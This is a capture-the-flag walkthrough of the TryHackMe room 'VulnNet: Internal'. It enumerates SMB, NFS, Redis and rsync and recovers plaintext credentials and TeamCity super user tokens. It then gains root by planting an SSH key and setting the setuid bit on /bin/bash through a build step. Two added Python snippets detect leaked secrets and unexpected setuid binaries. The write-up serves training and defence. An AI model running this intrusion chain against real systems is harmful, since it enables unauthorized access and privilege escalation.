TryHackMe | Vulnet-Internal

A room on TryHackMe created by TheCyb3rW0lf featuring various services to exploit.

VulnNet: Internal

Tasks

  • services flag

Vulnerabilities

  • Sensitive files in SMB share with Anonymous Login.

NMAP

PORT     STATE    SERVICE     REASON      VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
| 256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
| 256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 38337/tcp6 mountd
| 100005 1,2,3 40435/udp mountd
| 100005 1,2,3 46762/udp6 mountd
| 100005 1,2,3 56457/tcp mountd
| 100021 1,3,4 40452/udp6 nlockmgr
| 100021 1,3,4 41523/tcp6 nlockmgr
| 100021 1,3,4 42869/udp nlockmgr
| 100021 1,3,4 43173/tcp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp open rsync syn-ack (protocol version 31)
2049/tcp open nfs_acl syn-ack 3 (RPC #100227)
9090/tcp filtered zeus-admin no-response
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
| nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| VULNNET-INTERNA<00> Flags: <unique><active>
| VULNNET-INTERNA<03> Flags: <unique><active>
| VULNNET-INTERNA<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 21990/tcp): CLEAN (Couldn't connect)
| Check 2 (port 46838/tcp): CLEAN (Couldn't connect)
| Check 3 (port 19384/udp): CLEAN (Failed to receive data)
| Check 4 (port 39015/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: vulnnet-internal
| NetBIOS computer name: VULNNET-INTERNAL\x00
| Domain name: \x00
| FQDN: vulnnet-internal
|_ System time: 2021-05-14T15:40:20+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-14T13:40:20
|_ start_date: N/A

From our Nmap scan we can see that a lot of service ports are open, such as Samba and NFS. Usually my first step is to check the web server, but since there isn't one here we can check out the SMB server first.

Enum4linux

========================================= 
| Share Enumeration on 10.10.106.60 |
=========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
shares Disk VulnNet Business Shares
IPC$ IPC IPC Service (vulnnet-internal server (Samba, Ubuntu))

I used a tool called enum4linux to enumerate SMB; you can use whichever tool you prefer for this. We can connect to the 'shares' share using smbclient. In there we will find some sensitive information and our first flag.

NFS

Next we'll proceed with the NFS server, but what actually is NFS?

  • It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory
showmount -e $IP
mkdir /tmp/NFS
sudo mount -t nfs $IP:/opt/conf /tmp/NFS

showmount -e $IP shows us the exports (shared directories) available on the server. Then we create a mount point and mount the export; we can then browse the mounted directory to view its contents. After looking around a bit, I found something interesting in redis.conf:

requirepass "B65Hx562F@ggAZ@F"

Seems like the password for the Redis server.

Redis

Before diving into redis, what is it actually?

  • Redis is an in-memory data structure store, used as a distributed, in-memory key–value database, cache and message broker, with optional durability.
redis-cli -h $IP

Enter the password we found using AUTH, or supply -a followed by the password in the initial command.

  • Since Redis is a key-value store, let's list all keys using KEYS *
10.10.106.60:6379> KEYS *
1) "internal flag"
2) "authlist"
3) "marketlist"
4) "tmp"
5) "int"

Our second flag and some sensitive information, in particular 'authlist'. Checking its type, authlist is a list.

  • Use lrange to list out authlist
QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==
QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==
QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==
  • Using CyberChef we can confirm it is indeed Base64 encoded; decoding gives:
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v

Rsync

  • Rsync, or Remote Sync, is a free command-line tool that lets you transfer files and directories to local and remote destinations. Rsync is used for mirroring, performing backups, or migrating data to other servers.
rsync $IP::
  • Let’s try to connect to the server using rsync
rsync $IP::files
Password:
@ERROR: auth failed on module files
rsync error: error starting client-server protocol (code 5) at main.c(1814) [Receiver=3.2.3]

Weird, we're unable to connect even with the correct password.

  • Let’s try to copy all the files instead
rsync -av rsync://rsync-connect@$IP/files ctf_files

-a means archive while -v is verbose.

  • Among the copied files is sys-internal, the user's home directory, where we find user.txt. We can also upload our SSH public key as that user's authorized_keys:
rsync -av .ssh/id_rsa.pub rsync://rsync-connect@$IP/files/sys-internal/.ssh/authorized_keys

We can then log in over SSH using the matching private key.

Privesc

  • We don't know the password for sys-internal, but we can upload and run linpeas.sh. Listing connections with ss shows something listening on localhost:
sys-internal@vulnnet-internal:~$ ss -tno
State Recv-Q Send-Q Local Address:Port Peer Address:Port
ESTAB 0 84 10.10.106.60:2049 10.17.1.163:982 timer:(on,744ms,0)
ESTAB 0 108 10.10.106.60:22 10.17.1.163:47754 timer:(on,784ms,0)
ESTAB 0 0 [::ffff:127.0.0.1]:59073 [::ffff:127.0.0.1]:8111
CLOSE-WAIT 1 0 [::ffff:127.0.0.1]:58999 [::ffff:127.0.0.1]:8111
ESTAB 0 0 [::ffff:127.0.0.1]:8111 [::ffff:127.0.0.1]:59073

Let's see what is listening on port 8111 by forwarding it over SSH:

sudo ssh sys-internal@10.10.106.60 -i .ssh/id_rsa -L 8111:127.0.0.1:8111

We can now browse to http://127.0.0.1:8111, which brings us to a TeamCity login page.

  • Perhaps there is more on this server. Navigating to /, there is a TeamCity directory; it contains a lot of directories and files, but the interesting one for us CTF players is the logs directory. There were a lot of logs, but I was most interested in catalina.out and teamcity-auth.log:
[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 1966994702089781692 (use empty username with the token as the password to access the server)

After looking around, I found multiple super user tokens; I tried all of them and one worked.
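The authlist entries and the TeamCity log lines above are two instances of the same problem: secrets written where they should not be (a Base64-wrapped rsync credential in a Redis list, super user tokens in a readable log). The following added example, not part of the original writeup, is a small detector that decodes Base64 only where it validates, flags credential strings, deduplicates leaked tokens and reports only redacted values. The function names are mine; the sample inputs are constructed from the values shown on this page plus some benign noise.

```python
import base64
import re

# Constructed samples modelled on what this box exposes: the Base64 value from
# the Redis 'authlist' list and the token lines from the TeamCity logs above;
# the second list entry and the INFO line are made-up benign noise.
REDIS_AUTHLIST = [
    "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==",
    "bWFya2V0aW5nIHJlcG9ydA==",  # "marketing report": valid Base64, not a secret
]
TEAMCITY_LOG = [
    "[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)",
    "[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)",
    "[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)",
    "[TeamCity] INFO - Server started",
]
PASSWORD_RE = re.compile(r"\bpassword\s+(\S+)", re.IGNORECASE)
TOKEN_RE = re.compile(r"Super user authentication token:\s*(\d+)")

def maybe_base64(text):
    """Decode strictly valid Base64 to UTF-8 text; return None otherwise."""
    try:
        return base64.b64decode(text, validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
        return None

def redact(secret):
    """Keep a two-character prefix for correlation; never report the secret itself."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 4 else "****"

def scan_redis_values(values):
    """Flag values carrying a password, decoding Base64 first when it validates."""
    findings = []
    for value in values:
        decoded = maybe_base64(value)
        text = value if decoded is None else decoded
        match = PASSWORD_RE.search(text)
        if match:
            findings.append({"source": "redis", "encoded": decoded is not None,
                             "secret": redact(match.group(1))})
    return findings

def scan_teamcity_log(lines):
    """One finding per distinct super user token, in first-seen order."""
    tokens = []
    for line in lines:
        match = TOKEN_RE.search(line)
        if match and match.group(1) not in tokens:
            tokens.append(match.group(1))
    return [{"source": "teamcity-log", "secret": redact(t)} for t in tokens]
```

Each distinct token in the report is one credential that must be rotated, and the redacted output can go straight into a ticket or SIEM without re-leaking it.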

  • Now let's manually create a project and then a build configuration for it that runs:
chmod u+s /bin/bash

Now let's run the build and check the permissions on bash:

bash-4.4$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1113504 Apr 4 2018 /bin/bash

Now simply run the binary to get root privileges:

bash-4.4$ /bin/bash -p
bash-4.4# whoami
root
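As a detection counterpart to the setuid change made through the build server above, here is an added example (not from the original writeup) that audits `ls -l` output, or live paths via os.stat, for setuid-root binaries that are absent from a known-good baseline. The sample lines and the BASELINE set are constructed; a real deployment should derive the baseline from the host's package manifests rather than from this hard-coded set.

```python
import os
import re
import stat

# Constructed `ls -l` lines: the first is the post-build state shown above,
# the other two are made-up entries for a normal binary and a legitimate setuid one.
SAMPLE_LS = [
    "-rwsr-xr-x 1 root root 1113504 Apr  4  2018 /bin/bash",
    "-rwxr-xr-x 1 root root  154072 Apr  4  2018 /bin/ls",
    "-rwsr-xr-x 1 root root   44664 Mar 22  2019 /bin/su",
]

# Assumption: setuid-root binaries expected on this host. Populate from a
# trusted baseline (e.g. package manifests), not from memory.
BASELINE = {"/bin/su", "/bin/mount", "/bin/umount", "/usr/bin/sudo", "/usr/bin/passwd"}

# mode links owner group size month day year-or-time path
LS_RE = re.compile(r"^(\S{10})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(.+)$")

def parse_ls_line(line):
    """Split one `ls -l` line into mode/owner/group/path; None if it does not parse."""
    match = LS_RE.match(line)
    if not match:
        return None
    mode, owner, group, path = match.groups()
    return {"mode": mode, "owner": owner, "group": group, "path": path}

def is_setuid(mode):
    # Owner-execute slot shows 's' (setuid + exec) or 'S' (setuid without exec).
    return mode[3] in "sS"

def unexpected_setuid_root(lines, baseline=BASELINE):
    """Paths that are setuid, owned by root, and not in the baseline."""
    hits = []
    for line in lines:
        entry = parse_ls_line(line)
        if (entry and entry["owner"] == "root" and is_setuid(entry["mode"])
                and entry["path"] not in baseline):
            hits.append(entry["path"])
    return hits

def live_setuid_root(paths, baseline=BASELINE):
    """Same check against the live filesystem using stat bits instead of text."""
    hits = []
    for path in paths:
        try:
            st = os.stat(path)
        except OSError:  # missing or unreadable: nothing to report
            continue
        if st.st_uid == 0 and st.st_mode & stat.S_ISUID and path not in baseline:
            hits.append(path)
    return hits
```

A setuid bit appearing on a shell is a high-confidence signal; pairing this with file-integrity monitoring on the CI server's build steps would have caught the change at the point it was introduced.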

In the end this was an interesting room and I learned a lot about internal services and a new way for privesc.

Student that loves FOSS